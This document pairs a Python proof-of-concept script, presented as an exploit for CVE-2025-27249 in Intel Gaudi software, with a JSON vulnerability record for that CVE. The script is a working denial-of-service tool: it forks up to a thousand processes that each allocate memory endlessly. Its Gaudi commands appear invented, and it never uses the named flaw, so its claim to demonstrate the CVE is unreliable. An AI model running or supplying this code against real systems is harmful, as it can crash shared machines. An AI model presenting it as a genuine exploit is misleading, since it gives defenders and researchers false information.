CVE-2025-27249

# CVE-2025-27249 PoC - Intel Gaudi Uncontrolled Resource Consumption # This PoC demonstrates resource exhaustion in Intel Gaudi software # Target: Intel Gaudi software < 1.21.0 # Attack Vector: Local access with authenticated user import os import sys import time import subprocess def check_gaudi_software_version(): """Check if vulnerable Gaudi software version is installed""" try: # Check Gaudi software version version_output = subprocess.check_output( ['haflow', '--version'], stderr=subprocess.STDOUT ).decode('utf-8') print(f"[+] Detected Gaudi software version: {version_output}") return True except Exception as e: print(f"[-] Error checking version: {e}") return False def trigger_resource_exhaustion(): """ Trigger uncontrolled resource consumption This PoC attempts to exhaust system resources through Gaudi API """ print("[*] Attempting to trigger resource exhaustion...") # Attempt to create excessive memory allocations # through repeated Gaudi operations process_count = 0 max_processes = 1000 while process_count < max_processes: try: # Fork new process that allocates Gaudi resources pid = os.fork() if pid == 0: # Child process - allocate Gaudi resources subprocess.Popen( ['haxc', 'run', '--memory-intensive'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL ) # Trigger memory allocation without cleanup while True: _ = bytearray(1024 * 1024 * 100) # Allocate 100MB else: process_count += 1 if process_count % 100 == 0: print(f"[*] Created {process_count} resource-intensive processes") time.sleep(0.1) except OSError as e: print(f"[!] Resource limit reached: {e}") break print(f"[!] System resource exhaustion triggered") print(f"[!] Created {process_count} processes before failure") return process_count def main(): print("=" * 60) print("CVE-2025-27249 PoC - Intel Gaudi Uncontrolled Resource Consumption") print("=" * 60) # Verify target system if not check_gaudi_software_version(): print("[-] Intel Gaudi software not detected") return # Check if running with low privileges print(f"[*] Current user: {os.getenv('USER', 'unknown')}") print(f"[*] Current UID: {os.getuid()}") # Trigger vulnerability print("[*] Starting resource exhaustion attack...") result = trigger_resource_exhaustion() if result > 0: print("[!] PoC executed successfully") print("[!] System may be experiencing DoS condition") else: print("[-] PoC failed to trigger vulnerability") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-27249", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:45.230", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled resource consumption for some Gaudi software before version 1.21.0 within Ring 3: User Applications may allow a denial of service. System software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01374.html", "source": "[email protected]"}]}}